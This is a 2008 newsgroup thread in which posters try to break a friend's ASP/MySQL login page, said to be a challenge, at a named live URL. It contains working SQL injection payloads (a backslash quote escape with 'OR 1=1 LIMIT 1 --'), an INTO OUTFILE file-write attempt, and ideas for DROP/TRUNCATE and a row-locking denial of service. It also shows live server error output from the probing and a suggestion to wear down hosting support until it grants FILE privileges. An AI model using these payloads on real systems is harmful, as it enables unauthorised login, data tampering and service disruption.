SQL injection

Hi Ng,

A friend of mine, has challenged me to break his login-script.
The script is written in ASP and uses a mysql server for data storage.

according to my findings,
he is checking if the input contains ' (single quotes) and if he finds any,
he aborts execution.

his SQL-statement is something like:

"select [Fields] from [table] where [passwordfield]='" & password & "' and
[userfield]='" & user & "'"


by inserting

password=\
user= or 1=1

i am left with

select [Fields] from [table] where [passwordfield]='\' and [userfield]=' or
1=1 '

The last ' (single quote) is what is keeping me from creating a valid
SQL-statement.

My question is:
how do I, without the use of single quotes, create a syntacticly correct
SQL-statement that will return at least one row of data, without knowing the
content of the database.?

I hope you can help me,

--
/Kasper

ps.
This is the page in question
http://vipom.dk/diverse/test/her.asp
For those of you who cannot understand it, the last line roughly translates:
If you succeed, write an email to [link]this email[/link]

"Kasper Lindberg" <NoSp@m.invalid> schreef in bericht
news:47a340ea$0$90266$14726298@news.sunsite.dk...
> Hi Ng,
>
> A friend of mine, has challenged me to break his login-script.
> The script is written in ASP and uses a mysql server for data storage.
>
> according to my findings,
> he is checking if the input contains ' (single quotes) and if he finds
> any, he aborts execution.
>
> his SQL-statement is something like:
>
> "select [Fields] from [table] where [passwordfield]='" & password & "' and
> [userfield]='" & user & "'"
>
>
> by inserting
>
> password=\
> user= or 1=1
>
> i am left with
>
> select [Fields] from [table] where [passwordfield]='\' and [userfield]='
> or 1=1 '
>
> The last ' (single quote) is what is keeping me from creating a valid
> SQL-statement.
>
> My question is:
> how do I, without the use of single quotes, create a syntacticly correct
> SQL-statement that will return at least one row of data, without knowing
> the content of the database.?
>
> I hope you can help me,
>
> --
> /Kasper
>
> ps.
> This is the page in question
> http://vipom.dk/diverse/test/her.asp
> For those of you who cannot understand it, the last line roughly
> translates:
> If you succeed, write an email to [link]this email[/link]
>

can you also translate this:
Ikke rigtigt password....
du har tastet Prøv igen
Tilbage (link to: http://vipom.dk/diverse/test/her.asp)

"Luuk" <luuk@invalid.lan> wrote in message
news:p2tb75-bo.ln1@leafnode.a62-251-88-195.adsl.xs4all.nl...
> can you also translate this:
> Ikke rigtigt password....
> du har tastet Prøv igen
> Tilbage (link to: http://vipom.dk/diverse/test/her.asp)
>

Incorrect password ....
you entered Try again
Back

"Kasper Lindberg" <NoSp@m.invalid> schreef in bericht
news:47a34ab1$0$90265$14726298@news.sunsite.dk...
>
> "Luuk" <luuk@invalid.lan> wrote in message
> news:p2tb75-bo.ln1@leafnode.a62-251-88-195.adsl.xs4all.nl...
>> can you also translate this:
>> Ikke rigtigt password....
>> du har tastet Prøv igen
>> Tilbage (link to: http://vipom.dk/diverse/test/her.asp)
>>
>
> Incorrect password ....
> you entered Try again
> Back
>

thanks, i thought i hit the jackpot,
because the background was GREEN ;-)

On Fri, 01 Feb 2008 16:55:22 +0100, Kasper Lindberg <NoSp@m.invalid> wrote:

> Hi Ng,
>
> A friend of mine, has challenged me to break his login-script.
> The script is written in ASP and uses a mysql server for data storage.
>
> according to my findings,
> he is checking if the input contains ' (single quotes) and if he finds
> any,
> he aborts execution.
>
> his SQL-statement is something like:
>
> "select [Fields] from [table] where [passwordfield]='" & password & "'
> and
> [userfield]='" & user & "'"
>
>
> by inserting
>
> password=\
> user= or 1=1
>
> i am left with
>
> select [Fields] from [table] where [passwordfield]='\' and [userfield]='
> or
> 1=1 '
>
> The last ' (single quote) is what is keeping me from creating a valid
> SQL-statement.
>
> My question is:
> how do I, without the use of single quotes, create a syntacticly correct
> SQL-statement that will return at least one row of data, without knowing
> the
> content of the database.?

I usually add a LIMIT clause for those sneaky bastards who check the
number of matches.

User: OR 1=1 LIMIT 1 -- (Or: OR 1=1 LIMIT 1 # )
Pass: \

Would create:
... where [passwordfield]='\' and [userfield]=' OR 1=1 LIMIT 1 -- '

Which would be fine if the query is all on one line & no ending delimiter
is needed (PHP & MySQL for instance).

I get a 500 internal error on that though:
Error Type:
Sun ONE ASP JavaScript runtime (0x80004005)
006~SQLState: 37000 Native Error Code: 1064 [MySQL][ODBC 3.51
Driver][mysqld-4.1.11-Debian_4sarge8-log]You have an error in your SQL
syntax; check the manual that corresponds to your MySQL server version for
the right syntax to use near ''\')' at line 1
/diverse/test/chekher.asp, line 97

... which could mean we have to close the query early... a rogue ';' in
there doesn't seem to solve it:
Error Type:
Sun ONE ASP JavaScript runtime (0x80004005)
006~SQLState: 37000 Native Error Code: 1064 [MySQL][ODBC 3.51
Driver][mysqld-4.1.11-Debian_4sarge8-log]You have an error in your SQL
syntax; check the manual that corresponds to your MySQL server version for
the right syntax to use near '; --'' at line 1
/diverse/test/chekher.asp, line 87

The difference in line numbers however, lead me to believe that he checks
twice, with possibly the fields in a different order, so if the first
succeeds, the second one fails (or he tries to retrieve more data which
fails). I'll leave that for someone else to sort out.

Offcourse, broken multibyte characters etc. often have unpredictable
impact.
--
Rik Wasmus

On Fri, 01 Feb 2008 19:54:42 +0100, Rik Wasmus
<luiheidsgoeroe@hotmail.com> wrote:

> On Fri, 01 Feb 2008 16:55:22 +0100, Kasper Lindberg <NoSp@m.invalid>
> wrote:
>
>> Hi Ng,
>>
>> A friend of mine, has challenged me to break his login-script.
>> The script is written in ASP and uses a mysql server for data storage..
>>
>> according to my findings,
>> he is checking if the input contains ' (single quotes) and if he finds
>> any,
>> he aborts execution.
>>
>> his SQL-statement is something like:
>>
>> "select [Fields] from [table] where [passwordfield]='" & password &"'
>> and
>> [userfield]='" & user & "'"
>>
>>
>> by inserting
>>
>> password=\
>> user= or 1=1
>>
>> i am left with
>>
>> select [Fields] from [table] where [passwordfield]='\' and
>> [userfield]=' or
>> 1=1 '
>>
>> The last ' (single quote) is what is keeping me from creating a valid
>> SQL-statement.
>>
>> My question is:
>> how do I, without the use of single quotes, create a syntacticly correct
>> SQL-statement that will return at least one row of data, without
>> knowing the
>> content of the database.?
>
> I usually add a LIMIT clause for those sneaky bastards who check the
> number of matches.
>
> User: OR 1=1 LIMIT 1 -- (Or: OR 1=1 LIMIT 1 # )
> Pass: \
>
> Would create:
> .. where [passwordfield]='\' and [userfield]=' OR 1=1 LIMIT 1 -- '
>
> Which would be fine if the query is all on one line & no ending
> delimiter is needed (PHP & MySQL for instance).
>
> I get a 500 internal error on that though:
> Error Type:
> Sun ONE ASP JavaScript runtime (0x80004005)
> 006~SQLState: 37000 Native Error Code: 1064 [MySQL][ODBC 3.51
> Driver][mysqld-4.1.11-Debian_4sarge8-log]You have an error in your SQL
> syntax; check the manual that corresponds to your MySQL server version
> for the right syntax to use near ''\')' at line 1
> /diverse/test/chekher.asp, line 97
>
> .. which could mean we have to close the query early... a rogue ';' in
> there doesn't seem to solve it:
> Error Type:
> Sun ONE ASP JavaScript runtime (0x80004005)
> 006~SQLState: 37000 Native Error Code: 1064 [MySQL][ODBC 3.51
> Driver][mysqld-4.1.11-Debian_4sarge8-log]You have an error in your SQL
> syntax; check the manual that corresponds to your MySQL server version
> for the right syntax to use near '; --'' at line 1
> /diverse/test/chekher.asp, line 87

So, like PHP BTW, a ; in it followed by random stuff (or a valid query) is
not possible. Oh the havoc I could've created by entering a DROP or
TRUNCATE query after it if it was supported (as soon as I found out the
tablenames offcourse).

> The difference in line numbers however, lead me to believe that he
> checks twice, with possibly the fields in a different order, so if the
> first succeeds, the second one fails (or he tries to retrieve more data
> which fails). I'll leave that for someone else to sort out.

Damn, leaving myself clues on the server also doesn't help it seems:
User: OR 1=1 LIMIT 1 INTO OUTFILE "/diverse/test/data.txt" --

Error Type:
Sun ONE ASP JavaScript runtime (0x80004005)
006~SQLState: S1T00 Native Error Code: 1045 [MySQL][ODBC 3.51
Driver][mysqld-4.1.11-Debian_4sarge8-log]Access denied for user
'vipom_dk'@'localhost' (using password: YES)
/diverse/test/chekher.asp, line 87

No FILE privilage most likely, and I'm not really about to sign up with
http://www.one.com to check out their directory structure anyway.

The 'check the manual that corresponds to your MySQL server version for
the right syntax to use near ''\')' at line 1 /diverse/test/chekher.asp,
line 97' is still intriguing me though... It must be either
....SOMEFUNCTION('<password>')..., or ...VALUES(...,'<password>')..., which
obviously fails due to the fact we can't do anything about not closing the
) at that point. I wonder whether it's another check that fails, or some
update/insert statement.

Now I'm really going to do something productive, after commenting that
while hacking has not (yet) succeeded, maybe using ' OR 1=1 FOR UPDATE--
' as a username continously could seriously hinder his ability to alter
the users database. On that note: never ever show database errors to the
users. They are only a clue for the potential harmfull, and a nuisance for
normal users. Log errors, show a nice page 'something has failed, our
apologies'.
--
Rik Wasmus

"Rik Wasmus" <luiheidsgoeroe@hotmail.com> wrote in message
news:op.t5u2y5ba5bnjuv@metallium.lan...
On Fri, 01 Feb 2008 19:54:42 +0100, Rik Wasmus
<luiheidsgoeroe@hotmail.com> wrote:
>> I usually add a LIMIT clause for those sneaky bastards who check the
>> number of matches.
>>
>> User: OR 1=1 LIMIT 1 -- (Or: OR 1=1 LIMIT 1 # )
>> Pass: \
>>
>> Would create:
>> .. where [passwordfield]='\' and [userfield]=' OR 1=1 LIMIT 1 -- '
>>
>> Which would be fine if the query is all on one line & no ending
>> delimiter is needed (PHP & MySQL for instance).
>>

And ASP as well

>> I get a 500 internal error on that though:
>> Error Type:
>> Sun ONE ASP JavaScript runtime (0x80004005)
>> 006~SQLState: 37000 Native Error Code: 1064 [MySQL][ODBC 3.51
>> Driver][mysqld-4.1.11-Debian_4sarge8-log]You have an error in your SQL
>> syntax; check the manual that corresponds to your MySQL server version
>> for the right syntax to use near ''\')' at line 1
>> /diverse/test/chekher.asp, line 97
>>

now thats intresting ...
what types of SQL-statements would end with the characters ')

To my knowlege, only the insert statement is logical in this case.

One optimistic guess is, that you actually solved it with the limit-clause,
but his logging of events (as mentioned, this is a test-setup) is what keeps
me from being redirected to the confirmation-page.


one guess would be, that the line 97 is something like:

insert into logtable ([some fields],[userfield],[passwordfield]) values
([timestamps etc.],' or 1=1 -- ','\')

> So, like PHP BTW, a ; in it followed by random stuff (or a valid query) is
> not possible. Oh the havoc I could've created by entering a DROP or
> TRUNCATE query after it if it was supported (as soon as I found out the
> tablenames offcourse).
>

well, I am trying to help the guy, not destroy his database ... play nice,
okay :)

>> The difference in line numbers however, lead me to believe that he
>> checks twice, with possibly the fields in a different order, so if the
>> first succeeds, the second one fails (or he tries to retrieve more data
>> which fails). I'll leave that for someone else to sort out.

As mentioned, I belive it to be a simple insert-statement for logging the
attempts.

>
> Damn, leaving myself clues on the server also doesn't help it seems:
> User: OR 1=1 LIMIT 1 INTO OUTFILE "/diverse/test/data.txt" --
>

I could tell you, but it doesn't work anyway. (i've testet it)
Besides, if anyone is to fill his server with random files, I'd prefere it
to be me (just imagine how much damage could be done).




> Error Type:
> Sun ONE ASP JavaScript runtime (0x80004005)
> 006~SQLState: S1T00 Native Error Code: 1045 [MySQL][ODBC 3.51
> Driver][mysqld-4.1.11-Debian_4sarge8-log]Access denied for user
> 'vipom_dk'@'localhost' (using password: YES)
> /diverse/test/chekher.asp, line 87
>
> No FILE privilage most likely, and I'm not really about to sign up with
> http://www.one.com to check out their directory structure anyway.
>

Well, Asking ther (in)competent support to grant those privileges, might do
the trick.

> The 'check the manual that corresponds to your MySQL server version for
> the right syntax to use near ''\')' at line 1 /diverse/test/chekher.asp,
> line 97' is still intriguing me though... It must be either
> ...SOMEFUNCTION('<password>')..., or ...VALUES(...,'<password>')..., which
> obviously fails due to the fact we can't do anything about not closing
> he ) at that point. I wonder whether it's another check that fails, or
> some update/insert statement.
>

I belive it to be the later option.

> Now I'm really going to do something productive, after commenting that
> while hacking has not (yet) succeeded, maybe using ' OR 1=1 FOR UPDATE --
> ' as a username continously could seriously hinder his ability to alter
> the users database.

Explain please, what would that acheive?

> On that note: never ever show database errors to the users. They are only
> a clue for the potential harmfull, and a nuisance for normal users. Log
> errors, show a nice page 'something has failed, our apologies'.

Exactly what I am going to tell him, when I'm done.


--
/Kasper

On Fri, 01 Feb 2008 22:32:52 +0100, Kasper Lindberg <NoSp@m.invalid> wrote:
>>> I usually add a LIMIT clause for those sneaky bastards who check the
>>> number of matches.
>>> User: OR 1=1 LIMIT 1 -- (Or: OR 1=1 LIMIT 1 # )
>>> Pass: \
>>>
>>> Would create:
>>> .. where [passwordfield]='\' and [userfield]=' OR 1=1 LIMIT 1-- '
>>>
>>> Which would be fine if the query is all on one line & no ending
>>> delimiter is needed (PHP & MySQL for instance).
>
> And ASP as well
>
>>> I get a 500 internal error on that though:
>>> Error Type:
>>> Sun ONE ASP JavaScript runtime (0x80004005)
>>> 006~SQLState: 37000 Native Error Code: 1064 [MySQL][ODBC 3.51
>>> Driver][mysqld-4.1.11-Debian_4sarge8-log]You have an error in your SQL
>>> syntax; check the manual that corresponds to your MySQL server version
>>> for the right syntax to use near ''\')' at line 1
>>> /diverse/test/chekher.asp, line 97
>>>
>
> now thats intresting ...
> what types of SQL-statements would end with the characters ')
>
> To my knowlege, only the insert statement is logical in this case.
>
> One optimistic guess is, that you actually solved it with the
> limit-clause,
> but his logging of events (as mentioned, this is a test-setup) is what
> keeps
> me from being redirected to the confirmation-page.
>
>
> one guess would be, that the line 97 is something like:
>
> insert into logtable ([some fields],[userfield],[passwordfield]) values
> ([timestamps etc.],' or 1=1 -- ','\')

Very likely.

>> So, like PHP BTW, a ; in it followed by random stuff (or a valid query)
>> is
>> not possible. Oh the havoc I could've created by entering a DROP or
>> TRUNCATE query after it if it was supported (as soon as I found out the
>> tablenames offcourse).
>>
>
> well, I am trying to help the guy, not destroy his database .. play nice,
> okay :)

Hehe, ask to hack, be hacked, I'm just getting my feet wet here SQL
injection wise.

>> Error Type:
>> Sun ONE ASP JavaScript runtime (0x80004005)
>> 006~SQLState: S1T00 Native Error Code: 1045 [MySQL][ODBC 3.51
>> Driver][mysqld-4.1.11-Debian_4sarge8-log]Access denied for user
>> 'vipom_dk'@'localhost' (using password: YES)
>> /diverse/test/chekher.asp, line 87
>>
>> No FILE privilage most likely, and I'm not really about to sign up with
>> http://www.one.com to check out their directory structure anyway.
>>
>
> Well, Asking ther (in)competent support to grant those privileges, might
> do
> the trick.

oe.com is all about one size fits all, no way you're getting those
priviliges (and I wouldn't give anyone those in a controlled environment
anyway).


>> The 'check the manual that corresponds to your MySQL server version for
>> the right syntax to use near ''\')' at line 1 /diverse/test/chekher.asp,
>> line 97' is still intriguing me though... It must be either
>> ...SOMEFUNCTION('<password>')..., or ...VALUES(...,'<password>')...,
>> which
>> obviously fails due to the fact we can't do anything about not closing
>> he ) at that point. I wonder whether it's another check that fails, or
>> some update/insert statement.
>>
>
> I belive it to be the later option.
>
>> Now I'm really going to do something productive, after commenting that
>> while hacking has not (yet) succeeded, maybe using ' OR 1=1 FOR UPDATE
>> --
>> ' as a username continously could seriously hinder his ability to alter
>> the users database.
>
> Explain please, what would that acheive?

Locking all rows matched for the duration of the transaction, so they
wouldn't be able to update or delete those rows. Not really of interest in
a low traffic site, where a simultanious alter/delete command combined
with the lock would be extremely rare. On a high traffic site (and with
anough (almost ddos) power behind the login attempts however, it could
render all your users incapable of chaging anything about their record.

>> On that note: never ever show database errors to the users. They are
>> only
>> a clue for the potential harmfull, and a nuisance for normal users. Log
>> errors, show a nice page 'something has failed, our apologies'.
>
> Exactly what I am going to tell him, when I'm done.

Hehe, indeed, leave them on for now, I might have inspiration tomorrow.....
--
Rik Wasmus

"Rik Wasmus" <luiheidsgoeroe@hotmail.com> wrote in message
news:op.t5vnoybr5bnjuv@metallium.lan...
On Fri, 01 Feb 2008 22:32:52 +0100, Kasper Lindberg <NoSp@m.invalid> wrote:
>>
>> well, I am trying to help the guy, not destroy his database .. play nice,
>> okay :)
>
> Hehe, ask to hack, be hacked, I'm just getting my feet wet here SQL
> injection wise.
>
>>>
>>> No FILE privilage most likely, and I'm not really about to sign up with
>>> http://www.one.com to check out their directory structure anyway.
>>>
>>
>> Well, Asking ther (in)competent support to grant those privileges, might
>> do
>> the trick.
>
> one.com is all about one size fits all, no way you're getting those
> priviliges
>

my experience is that, if you don't take no for an answer, eventualy they
get tired of you and give way, just to get rid of you. (usually I end up
with the same guy, after having gone through 1 or 2 other supporters, before
getting an answer to my questions)

> (and I wouldn't give anyone those in a controlled environment anyway).
>

you wouldn't, but what about their supporters?, I talked to one of them, and
she didn't know why I couldn't use the "into outfile" on a select statement.
To me, this indicates that they have no idea of what privileges they
should(n't) grant to users.

for the record, which user would the query be executed as? the user which
the mysql-deamon is running as, or the user calling ?
(trying to find out how many directories the "into outfile" could write)

>>> Now I'm really going to do something productive, after commenting that

Remember to describe your attempts here, both failures and successes

>>> while hacking has not (yet) succeeded, maybe using ' OR 1=1 FOR UPDATE
>>> ' as a username continously could seriously hinder his ability to alter
>>> the users database.
>>
>> Explain please, what would that acheive?
>
> Locking all rows matched for the duration of the transaction, so they
> wouldn't be able to update or delete those rows. Not really of interest in
> a low traffic site, where a simultanious alter/delete command combined
> with the lock would be extremely rare. On a high traffic site (and with
> anough (almost ddos) power behind the login attempts however, it could
> render all your users incapable of chaging anything about their record.
>

I think it is safe to say, that no changes to the user-table are performed,
ever, unless it is a part of the login-routine.

>>> On that note: never ever show database errors to the users. They are
>>> only
>>> a clue for the potential harmfull, and a nuisance for normal users. Log
>>> errors, show a nice page 'something has failed, our apologies'.
>>
>> Exactly what I am going to tell him, when I'm done.
>
> Hehe, indeed, leave them on for now, I might have inspiration tomorrow....
>

I will send an email to him, describing my findings, sunday evening, meaning
he will read it some time around 8 AM monday morning (GMT +1)

until then, nothing is going to change

--
Kasper